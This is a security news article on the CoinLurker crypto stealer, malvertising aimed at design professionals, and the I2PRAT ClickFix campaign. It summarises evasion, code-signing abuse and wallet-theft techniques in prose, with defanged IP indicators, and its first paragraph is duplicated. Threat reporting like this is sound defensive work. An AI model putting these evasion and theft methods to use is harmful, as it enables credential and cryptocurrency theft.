Hackers Use Webview2 to Install CoinLurker Malware and Avoid Security Monitoring
Threat actors are using phony software update lures to spread CoinLurker, a new stealer virus. In a technical paper released on Monday, Morphisec researcher Nadav Lorber stated, "Word in Go, CoinLurker uses state-of-the-art obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks."
Threat actors are using phony software update lures to spread CoinLurker, a new stealer virus. In a technical paper released on Monday, Morphisec researcher Nadav Lorber stated, "Word in Go, CoinLurker uses state-of-the-art obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks."
The attacks use a variety of misleading entry points, including phishing emails that link to spoof update pages, malware redirects, direct downloads from phoney or compromised websites, links shared on social media and messaging apps, and software update notifications on compromised WordPress sites. The software update recommends the use of Microsoft Edge Webview2 to initiate the infection chain, regardless of the technique used to do so.
"Webview2's dependency on pre-installed components and user interaction complicates dynamic and sandbox analysis," Lorber stated. "Sandboxes often lack Webview2 or fail to replicate user actions, allowing the malware to evade automated detection." EtherHiding is one of the more sophisticated strategies used in these campaigns. It involves inserting scripts into compromised websites that are intended to connect to Web3 infrastructure and retrieve the final payload from a Bitbucket repository that poses as trustworthy tools (e.g., "UpdateMe.exe," "SecurityPatch.exe").
Another layer of deceit is added to the method and security measures are circumvented by signing these executables using an Extended Validation (EV) certificate that is legitimate but stolen. "Multi-layered injector" is used to deploy the payload in the last phase.
In order to hide its activities and make analysis more difficult, CoinLurker also employs a clever design. This includes heavy obfuscation to determine whether the machine has already been compromised, decoding the payload in memory while the program is running, and obscuring the program execution path through the use of conditional checks, redundant resource assignments, and iterative memory manipulations. "This approach ensures that the malware evades detection, blends seamlessly into legitimate system activity, and bypasses network security rules that rely on process behavior for filtering," Morphisec said.
After CoinLurker is launched, it uses a socket-based method to establish contact with a remote server and then gathers information from particular folders connected to cryptocurrency wallets (namely, Bitcoin, Ethereum, Ledger Live, and Exodus), FileZilla, Telegram, and Discord. "This comprehensive scanning underscores CoinLurker's primary goal of harvesting valuable cryptocurrency-related data and user credentials," Lorber stated. "Its targeting of both mainstream and obscure wallets demonstrates its versatility and adaptability, making it a significant threat to users in the cryptocurrency ecosystem."
The development coincides with the discovery that, since at least November 13, 2024, a single threat actor has been employing lures associated with FreeCAD, Rhinoceros 3D, Planner 5D, and Onshape to orchestrate up to ten malvertising operations that exploit Google Search advertisements to target graphic design professionals. "Domains have been launched day after day, week after week, since at least November 13, 2024, for malvertising campaigns hosted on two dedicated IP addresses: 185.11.61[.]243 and 185.147.124[.]110," stated Silent Push. "Websites that originate from these two IP addresses are being launched in Google Search advertising campaigns, and all lead to a variety of malicious downloads."
Additionally, it comes after a new family of malware known as I2PRAT emerged, which exploits the peer-to-peer network for encrypted communications with a command-and-control (C2) server. It is important to note that Cofense also tracks I2PRAT under the moniker I2Parcae RAT. The attack begins with a phishing email that contains a link that, when clicked, takes the recipient to a phony CAPTCHA verification page. This page uses the ClickFix technique to trick users into copying and running a Base64-encoded PowerShell command that launches a downloader, which pulls the RAT from the C2 server via a TCP socket and then deploys it.